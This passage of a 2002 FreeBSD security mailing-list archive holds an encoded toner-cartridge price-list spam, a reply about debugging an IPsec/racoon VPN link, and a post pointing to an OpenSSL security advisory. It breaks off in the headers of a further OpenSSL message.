KzE+TGFzZXJXcml0ZXIgMzAwUFgvIDMyMC00TCwrNE1MPC9mb250PjwvZm9udD48L2NlbnRlcj4N CjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9 KzE+TTIwNDVHQTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVy Pjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ1NDwvZm9udD48L2ZvbnQ+PC9j ZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0i IzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICMzPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv 
dGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+ TGFzZXJXcml0ZXIgU2VsZWN0IDM2MDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8 dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPk0xOTYwR0E8 L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xv cj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kNzQ8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90 ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxm b250IHNpemU9KzE+SXRlbSAjNDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+ DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkxhc2VyV3JpdGVy IDE2LyA2MDAgUHJvJm5ic3A7PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4N CjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+TTI0NzNHQTwvZm9u dD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIj MDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ1OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0K PC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQg c2l6ZT0rMT5JdGVtICM1PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxj ZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+TGFzZXJXcml0ZXIgMTIv IDY0MCBQUzwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxm b250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPk00NjgzR0EmbmJzcDs8L2ZvbnQ+PC9m b250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5 OSI+PGZvbnQgc2l6ZT0rMT4kODk8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+ DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9 KzE+SXRlbSAjNjwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVy Pjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkxhc2VyIFdyaXRlciBOVC8yTlQ8 L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xv cj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5NNDUzMkdBPC9mb250PjwvZm9udD48L2NlbnRlcj4N CjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9 
KzE+JDQ5PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQo8L3RyPg0KPC90YWJsZT48L2Nl bnRlcj4NCg0KPGNlbnRlcj4NCjxwPjxmb250IGZhY2U9IkFyaWFsLEhlbHZldGljYSI+Jm5ic3A7 PHU+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzI+Rm9yDQpDYW5ub24gQ29waWVy czogKFBhZ2UgMTApPC9mb250PjwvZm9udD48L3U+PC9mb250PjwvY2VudGVyPg0KDQo8cD48YnI+ DQo8Y2VudGVyPjx0YWJsZSBCT1JERVIgV0lEVEg9IjgwJSIgSEVJR0hUPSIxMCUiIEJHQ09MT1I9 IiNGRkZGQ0MiID4NCjx0ciBCR0NPTE9SPSIjNDA4MDgwIj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQg Y29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9KzE+SVRFTTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+ DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjRkZGRkZGIj48Zm9udCBzaXpl PSsxPkRFU0NSSVBUSU9OPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxj ZW50ZXI+PGZvbnQgY29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9KzE+TUZHICM8L2ZvbnQ+PC9m b250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iI0ZGRkZG RiI+PGZvbnQgc2l6ZT0rMT5QUklDRTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90 cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT5JdGVtICMgMTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2Vu dGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPlBDIDYvIDZSRS8gNy8gOC8g MTEvIDEyLyA2NTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVy Pjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwO0EzMCZuYnNwOzwvZm9u dD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIj MDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ2OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0K PC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQg c2l6ZT0rMT5JdGVtICMgMjwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8 Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPlBDIDMwMC8zMjAvMzQw LzM2MCZuYnNwOyBBbGwNCjMwMCBTZXJpZXM8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4N Cg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4mbmJz cDtFNDAmbmJzcDs8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRl 
cj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kODk8L2ZvbnQ+PC9mb250Pjwv Y2VudGVyPg0KPC90ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9 IiMwMDAwOTkiPjxmb250IHNpemU9KzE+SXRlbSAjMzwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8 L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsx PlBDIDcwMC83MjAvNzYwJm5ic3A7IEFsbCA3MDANClNlcmllczwvZm9udD48L2ZvbnQ+PC9jZW50 ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBz aXplPSsxPiZuYnNwO0U0MCZuYnNwOzwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8 dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ4OTwvZm9u dD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48 Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICM0PC9mb250PjwvZm9udD48 L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxm b250IHNpemU9KzE+UEMgOTAwLzkxMC85MjAmbmJzcDsgQWxsIDkwMA0KU2VyaWVzPC9mb250Pjwv Zm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAw OTkiPjxmb250IHNpemU9KzE+Jm5ic3A7RTQwPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+ DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDg5 PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQo8L3RyPg0KPC90YWJsZT48L2NlbnRlcj4N Cg0KPGNlbnRlcj4NCjxwPjx1Pjxmb250IGZhY2U9IkFyaWFsLEhlbHZldGljYSI+PGZvbnQgY29s b3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzI+Rm9yDQpFcHNvbiBhbmQgUGFuYXNvbmljIFByaW50 ZXJzOihvbiBQYWdlcyA0ICZhbXA7IDcpPC9mb250PjwvZm9udD48L2ZvbnQ+PC91PjwvY2VudGVy Pg0KDQo8cD48YnI+DQo8Y2VudGVyPjx0YWJsZSBCT1JERVIgV0lEVEg9IjgwJSIgSEVJR0hUPSIx MCUiIEJHQ09MT1I9IiNGRkZGQ0MiID4NCjx0ciBCR0NPTE9SPSIjNDA4MDgwIj4NCjx0ZD4NCjxj ZW50ZXI+PGZvbnQgY29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9KzE+SVRFTTwvZm9udD48L2Zv bnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IHNpemU9KzE+Jm5ic3A7 PGZvbnQgY29sb3I9IiNGRkZGRkYiPkRFU0NSSVBUSU9OPC9mb250PjwvZm9udD48L2NlbnRlcj4N CjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9 
KzE+TUZHICM8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48 Zm9udCBjb2xvcj0iI0ZGRkZGRiI+PGZvbnQgc2l6ZT0rMT5QUklDRTwvZm9udD48L2ZvbnQ+PC9j ZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0i IzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICMgMTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8 L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsx PkVwc29uIDEwMDAvMTUwMDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8 Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPlMwNTEwMTEmbmJzcDs8 L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xv cj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kMTA1PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48 Zm9udCBzaXplPSsxPkl0ZW0gIzImbmJzcDs8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4N Cg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5FcHNv biBFUEw3MDAwLzgwMDAmbmJzcDs8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRk Pg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5TMDUxMjAwJm5i c3A7PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQg Y29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDEwNSZuYnNwOzwvZm9udD48L2ZvbnQ+PC9j ZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0i IzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICMzPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+ UGFuYXNvbmljIDkwLzk1Jm5ic3A7PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0 ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+LS0tLS0tLS0t LS0tLS0tLT48L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48 Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kMTA1PC9mb250PjwvZm9udD48L2Nl bnRlcj4NCjwvdGQ+DQo8L3RyPg0KPC90YWJsZT48L2NlbnRlcj4NCg0KPGNlbnRlcj4NCjxwPjx1 Pjxmb250IHNpemU9KzM+U29ycnksPC9mb250PjwvdT48Zm9udCBzaXplPSsyPiZuYnNwOyBTdGls 
bCBubyBJbmtqZXRzLA0KYnViYmxlIGpldHMgb3IgWGVyb3ggaW4gc3RvY2s8L2ZvbnQ+DQo8YnI+ Jm5ic3A7DQo8YnI+Jm5ic3A7DQo8YnI+Jm5ic3A7DQo8cD48dT48Yj5ESVNDTEFJTUVSUzwvYj46 PC91Pg0KPHA+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7IEFsbCB0cmFkZW1hcmtzLCBicmFuZCBu YW1lcyBhbmQgZGlhZ3JhbXMgbGlzdGVkDQpvciBzaG93biBhYm92ZQ0KPGJyPmFyZSBwcm9wZXJ0 eSBvZiB0aGVpciByZXNwZWN0aXZlIGhvbGRlcnMmbmJzcDsmbmJzcDsgYW5kIHVzZWQgZm9yIGRl c2NyaXB0aXZlDQpwdXJwb3NlcyBvbmx5DQo8YnI+LldlIGRvIG5vdCBjYXJyeSBhbnkgSFAgT0VN Jm5ic3A7IFByb2R1Y3RzLg0KPHA+PGZvbnQgZmFjZT0iQ29taWMgU2FucyBNUyI+PHU+Tk9URVM8 L3U+OjwvZm9udD4NCjxwPlVuaXZlcnNpdHkgYW5kIFNjaG9vbCBQdXJjaGFzZSBvcmRlcnMgd2Vs Y29tZS4gKE5vIENyZWRpdCBhcHByb3ZhbCByZXF1aXJlZC4NCkFsbCBvdGhlciBQdXJjaGFzZQ0K PGJyPiZuYnNwOyZuYnNwOyZuYnNwOyBvcmRlcnMgcmVxdWlyZSBjcmVkaXQgYXBwcm92YWwNCjxi cj4mbmJzcDtQYXkgYnkgY2hlY2sgKEMuTy5ELiksIENyZWRpdCBjYXJkIG9yIHB1cmNoYXNlIG9y ZGVyIChOZXQgMzANCkRheXMpDQo8YnI+U2hpcHBpbmcgY2hhcmdlcyBzdGFydCBhdCAkNC41IHBl ciBjYXJ0cmlkZ2UuIEFkZCAkMS41IGZvciBlYWNoIGFkZGl0aW9uYWwNCmNhcnRyaWRnZS4gQ2Fy dHJpZGdlcw0KPGJyPiZuYnNwOyZuYnNwOyZuYnNwOyBkZWxpdmVyZWQgYnkgRmVkZXJhbCBFeHBy ZXNzIHdpdGhpbiAyIHRvIDUgd29ya2luZw0KZGF5cyBkZXBlbmRpbmcgb24geW91ciBsb2NhdGlv bi4NCjxicj5TaGlwcGluZyBhbmQgYmlsbGluZyBhZGRyZXNzZXMgYXJlIHJlcXVpcmVkIGZvciBQ dXJjaGFzZSBPcmRlciB0cmFuc2FjdGlvbnMuDQpZb3VyIGludm9pY2Ugd2lsbA0KPGJyPiZuYnNw OyZuYnNwOyZuYnNwOyBiZSBhdHRhY2hlZCB0byB5b3VyIHBhY2thZ2luZy4gUGxlYXNlIHBlYWwg YW5kIHBheQ0Kd2l0aGluIDMwIGRheXMuDQo8YnI+MzAgZGF5IHN0YW5kYXJkIHJldHVybiBwb2xp Y3kgKG1vbmV5IGJhY2sgZ3VhcmFudGVlKSBvbiBhbGwgbWVyY2hhbmRpc2UuDQo5MCBkYXkgdW5s aW1pdGVkIGV4Y2hhbmdlIHBvbGljeQ0KPGJyPiZuYnNwOyZuYnNwOyZuYnNwOyBmb3IgZGVmZWN0 aXZlIG1lcmNoYW5kaXNlPGZvbnQgZmFjZT0iQ29taWMgU2FucyBNUyI+LjwvZm9udD4NCjxwPjxi Pjx1PkVYQ0xVU0lPTlM6PC91PjwvYj4NCjxwPjx1PldlIGRvIG5vdCBjYXJyeTo8L3U+DQo8cD4m bmJzcDsmbmJzcDsmbmJzcDsgLSBYZXJveCwgQnJvdGhlciwgUGFuYXNvbmljLCBvciBGdWppdHN1 IFByb2R1Y3RzDQo8YnI+Jm5ic3A7Jm5ic3A7Jm5ic3A7IC0gRGVza2pldC9JbmtqZXQgb3IgQnVi 
YmxlamV0IHByb2R1Y3RzDQo8YnI+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7IC1BbnkgT2ZmYnJh bmRzIGJlc2lkZXMgdGhlIG9uZXMgbGlzdGVkIGFib3ZlLg0KQWxsIGNhcnRyaWRnZXMNCjxicj4m bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsgYXJl IGNvbXBhdGlibGUNCmhpZ2ggeWllbGQgcHJvZHVjDQo8YnI+PGZvbnQgZmFjZT0iQnJ1c2hTY3Jp cHQgQlQiPjxmb250IGNvbG9yPSIjRkY2NjY2Ij48Zm9udCBzaXplPSs0PjwvZm9udD48L2ZvbnQ+ PC9mb250PiZuYnNwOzxmb250IA0KZmFjZT0iQnJ1c2hTY3JpcHQgQlQiPjxmb250IGNvbG9yPSIj RkY2NjY2Ij48Zm9udCBzaXplPSs0PjwvZm9udD48L2ZvbnQ+PC9mb250Pg0KPHA+PGZvbnQgZmFj ZT0iQnJ1c2hTY3JpcHQgQlQiPjxmb250IGNvbG9yPSIjRkY2NjY2Ij48Zm9udCBzaXplPSs0Pkhh dmUNCmEgZ3JlYXQgZGF5ISE8L2ZvbnQ+PC9mb250PjwvZm9udD48L2NlbnRlcj4NCg0KPHA+PGJy Pg0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZu YnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJy PiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0K PGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNw Ow0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZu YnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJy PiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGRsPg0KPGR0Pg0KPC9kdD4NCjwvZGw+ DQoNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxicj4m bmJzcDsNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxi cj4mbmJzcDsNCjwvYm9keT4NCjwvaHRtbD4NCg== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 23:11:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3883037B405 for ; Mon, 29 Jul 2002 23:11:51 -0700 (PDT) Received: from mail1.getin.pl (mail1.getin.pl [194.153.216.60]) by mx1.FreeBSD.org (Postfix) with ESMTP id DB53343E67 for ; Mon, 29 Jul 2002 23:11:49 -0700 (PDT) (envelope-from 
c.nolewajka@m2mob.com) Received: from cezary ([212.244.99.70]) by mail1.getin.pl with Microsoft SMTPSVC(5.5.1877.507.50); Tue, 30 Jul 2002 08:07:49 +0200 From: "Cezary Nolewajka" To: Subject: Date: Tue, 30 Jul 2002 08:15:23 +0200 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-2" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Cezary Nolewajka Getin Sp. z o.o. mailto:c.nolewajka@m2mob.com tel.: +48 71 3475746 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 0:48:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E460A37B400; Tue, 30 Jul 2002 00:48:24 -0700 (PDT) Received: from sccrmhc02.attbi.com (sccrmhc02.attbi.com [204.127.202.62]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3015243E6A; Tue, 30 Jul 2002 00:48:24 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: from blossom.cjclark.org ([12.234.91.48]) by sccrmhc02.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020730074818.RDDD221.sccrmhc02.attbi.com@blossom.cjclark.org>; Tue, 30 Jul 2002 07:48:18 +0000 Received: from blossom.cjclark.org (localhost. 
[127.0.0.1]) by blossom.cjclark.org (8.12.3/8.12.3) with ESMTP id g6U7mHJK090064; Tue, 30 Jul 2002 00:48:17 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: (from cjc@localhost) by blossom.cjclark.org (8.12.3/8.12.3/Submit) id g6U7mDbf090063; Tue, 30 Jul 2002 00:48:13 -0700 (PDT) X-Authentication-Warning: blossom.cjclark.org: cjc set sender to crist.clark@attbi.com using -f Date: Tue, 30 Jul 2002 00:48:13 -0700 From: "Crist J. Clark" To: Matthew Grooms Cc: dlavigne6@cogeco.ca, freebsd-questions@FreeBSD.ORG Subject: Re: vpn1/fw1 NG to ipsec/racoon troubles, help please ... Message-ID: <20020730074813.GF89241@blossom.cjclark.org> Reply-To: "Crist J. Clark" References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4i X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org [Please, -questions or -security, but not both.] On Mon, Jul 29, 2002 at 02:49:22PM -0500, Matthew Grooms wrote: > Ok, Im a moron. I was trying to use the gif griver whan I shouldn't > have. I've never figured out why people use gif(4) interfaces when ESP does the tunneling for you. [snip] > When the connection is initiated from the bsd side, traffic passes > through the vpn1 box, enencrypted and routed to the remote host without > a problem. Unfotunately, the response from the remote host gets caught > up on the return trip. I am guessing this is because the bsd and vpn1 > box agree on an outbound ( from the bsd boxs perspective ) proposal but > cannot agree on an inbound proposal. The checkpoint error logs say > 'encryption failure : no response from peer'. However, here is some > tcpdump output that shows bi-directional communications. Im not sure how > to interperate this. Any ideas anyone? 
>
> tcpdump: listening on eth0

The output from running racoon(8) with the '-d' option would be much more useful.

-- 
Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu
http://people.freebsd.org/~cjc/ | cjc@freebsd.org

From owner-freebsd-security Tue Jul 30 6:44:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2BA3537B400 for ; Tue, 30 Jul 2002 06:44:42 -0700 (PDT) Received: from mail47.fg.online.no (mail47-s.fg.online.no [148.122.161.47]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3C6BE43E4A for ; Tue, 30 Jul 2002 06:44:41 -0700 (PDT) (envelope-from pulz@pulz.no) Received: from elixor (ti500720a080-0896.bb.online.no [80.213.75.128]) by mail47.fg.online.no (8.9.3/8.9.3) with SMTP id PAA21885 for ; Tue, 30 Jul 2002 15:44:40 +0200 (MET DST) Message-ID: <004001c237cf$23c00560$fa00a8c0@elixor> From: =?iso-8859-1?Q?Geir_R=E5ness?= To: Subject: About the openssl hole Date: Tue, 30 Jul 2002 15:43:50 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_003D_01C237DF.E6BDD370" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Should we start to edit the openssl port (I have emailed the maintainer to update to 96.e, "or supply the patch from openssl" in the /usr/ports/security/openssl), or should we wait for a patch from the freebsd team?
If you look at bugtraq there are already rumours about exploits flying around now.

Read the Advisory from openssl here:
http://www.openssl.org/news/secadv_20020730.txt

Best Regards
Geir Råness
From owner-freebsd-security Tue Jul 30 6:46:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B334137B408 for ; Tue, 30 Jul 2002 06:46:25 -0700 (PDT) Received: from obsidian.sentex.ca (obsidian.sentex.ca [64.7.128.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id A8F7043E5E for ; Tue, 30 Jul 2002 06:46:24 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simian.sentex.net (pyroxene.sentex.ca [199.212.134.18]) by obsidian.sentex.ca (8.12.5/8.12.5) with ESMTP id g6UDjgQR056422 for ; Tue, 30 Jul 2002 09:45:42 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.1.6.0.20020730094646.04e69a28@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Tue, 30 Jul 2002 09:49:03 -0400 To: security@freebsd.org From: Mike Tancsa Subject: OpenSSL security issues Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (obsidian/20020220) X-Spam-Status: No, hits=0.0 required=7.0 tests=none version=2.31 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: 